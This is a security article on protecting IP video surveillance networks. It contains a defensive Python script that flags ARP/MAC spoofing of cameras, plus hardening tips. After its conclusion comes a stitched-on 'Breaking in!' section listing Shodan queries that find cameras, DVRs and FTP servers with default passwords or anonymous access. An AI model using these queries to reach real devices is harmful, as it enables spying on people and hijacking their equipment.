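Where the switches cannot enforce this, the substitution described above still leaves a trace in neighbour tables: the camera's IP address starts resolving to a different MAC. The following added example (not from the original article) compares the output of `ip -4 neigh show`, taken on a monitoring host in the camera network, with a known-good inventory. The function names, addresses and snapshot are constructed for illustration.

```python
import re

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>[0-9a-fA-F:]{17})\s+\S+"
)


def parse_neigh(text):
    """Parse `ip -4 neigh show` output into {ip: mac}; entries without lladdr are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def find_arp_anomalies(baseline, observed):
    """Compare an observed neighbour table with the known-good IP -> MAC baseline."""
    alerts = []
    for ip, good_mac in sorted(baseline.items()):
        seen = observed.get(ip)
        if seen is not None and seen != good_mac.lower():
            alerts.append(("mac-changed", ip, seen))
    # One MAC answering for several protected addresses means a single host
    # is standing in for all of them.
    owners = {}
    for ip, mac in observed.items():
        if ip in baseline:
            owners.setdefault(mac, []).append(ip)
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:
            alerts.append(("mac-shared", ",".join(sorted(ips)), mac))
    return alerts


# Constructed data: documentation IP and MAC ranges.
BASELINE = {
    "192.0.2.2": "00:00:5e:00:53:02",    # video surveillance server
    "192.0.2.10": "00:00:5e:00:53:10",   # camera 1
    "192.0.2.11": "00:00:5e:00:53:11",   # camera 2
}
SNAPSHOT = """\
192.0.2.2 dev eth0 lladdr 00:00:5e:00:53:02 REACHABLE
192.0.2.10 dev eth0 lladdr 00:00:5e:00:53:aa STALE
192.0.2.11 dev eth0 lladdr 00:00:5E:00:53:AA REACHABLE
192.0.2.12 dev eth0  FAILED
192.0.2.50 dev eth0 lladdr 00:00:5e:00:53:aa REACHABLE
"""

for alert in find_arp_anomalies(BASELINE, parse_neigh(SNAPSHOT)):
    print(alert)
```

A legitimately replaced camera also triggers "mac-changed", so the baseline has to be updated as part of any hardware swap.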

7. Network separation

Pay special attention to this item, as it plays a big role in the security of your system. Separating the enterprise network from the video surveillance network will protect you from intruders, and even from your own employees who have access to the common network and want to hack you.

8. Enabling the OSD menu

You must enable the OSD menu with the current time and date on the camera so that you can always check that the image is current. This is a good way to protect specifically against substitution of the video feed, as the OSD is superimposed on all video coming from a specific camera. Even when the attacker records the RTSP stream, the substitution will be noticeable from the data that remains on the video frames.

Unfortunately, many attackers have learned to quickly find and exploit vulnerabilities in IP video surveillance systems. To secure the network, it is necessary to be familiar with the methods of protection described in this article. Give enough attention to commissioning the system and especially to correctly configuring all its components. This way you can give your networks maximum protection against hacking.

In conclusion, we suggest you share in the comments how you would protect your video surveillance network from hacking. What methods of attack do you consider the most dangerous?

A little theory, then practice....

Almost all modern digital video surveillance cameras are built on the Linux operating system, heavily stripped down so that it contains only what is necessary for operation. Linux itself is free, very reliable and resistant to external influences and hacks, so manufacturers build video recorders, video servers, video surveillance cameras, NAS and other smart gadgets on it.

By "hacking a video surveillance camera" we mean gaining administrator access.

Access can be obtained to:

  • The camera's graphical web interface. Having obtained such access, the attacker can view the video; if there is a microphone, hear what is happening; and if there is two-way audio (microphone and speaker), talk with the victim. All the settings that the device has are also available.

  • The operating system, over SSH or another protocol. Having gained access, the attacker gets a command line. This kind of vulnerability was used in large-scale DDoS attacks that hackers launched from hacked cameras, as well as to use the computing power of video surveillance equipment for cryptocurrency mining.

Consider the weaknesses of such devices.

Human factor. The device has standard settings: a standard login and password. After the equipment is installed, they must be changed.

The incompetence of the specialists who installed and configured the video cameras. You need to understand how the system is built: when an external IP address is used, the device that faces outward (to the Internet) must be reliably protected. Proper attention must also be given to protecting the Wi-Fi router, which is used almost everywhere there is Internet access.

The use of standard or weak passwords (fewer than 8 characters). For hacking, dictionary brute-force attacks (the enumeration method) are usually used; the dictionary contains all the standard passwords: admin, 888888, 123456, 12345, etc.

To protect owners, manufacturers introduce additional security measures. For example, all new Hikvision devices require activation, which forces the owner to set a password that meets the security requirements: uppercase and lowercase letters, digits, and a minimum length.

There are many hacking methods; consider one of the simplest, using the Shodan search engine. The search engine constantly scans the Internet and builds a database of devices that responded to its requests: recorders, video surveillance cameras, routers, firewalls, that is, all network devices that face the worldwide network. Let's try to access the devices that have default (standard) passwords.

Go to practice. Breaking in! We go to the site: Without registration, we will be limited in the number of requests, so it is better to go through the simple registration procedure on the site. Next, in the search string we enter what we want to find. Examples of requests for unauthorized access, hacking:

default password port:80
(where default password means devices with standard passwords, and port:80 is used for receiving and transmitting data over HTTP; in our case we are looking for all devices with a web interface).

port:80 NVR country:"IT"
(We are looking for NVR, Network Video Recorder, devices, that is, DVRs; country:"IT" means the search is performed only in Italy).

port:80 DVR country:"RU"
(We are looking for DVR, Digital Video Recorder, devices in Russia).

port:80 country:"RU" ASUS
(We are looking for equipment with a web interface in Russia made by ASUS; most of the results will probably be routers from this manufacturer).

230 Anonymous Access Granted
(We get access to FTP servers with anonymous access).

Android Webcam
(Android gadgets that are used as webcams).

Server: SQ-Webcam
(This request displays a list of equipment with servers on which webcams were detected).

The full list of commands can be found on the Shodan search engine site.

And do not forget: when hacking, all the responsibility will be on you! As an example, for the first request:

The search database found 3278 results. In the second and third results, as seen in Fig. 1, the login is admin and the password for access to the web interface is 1234.
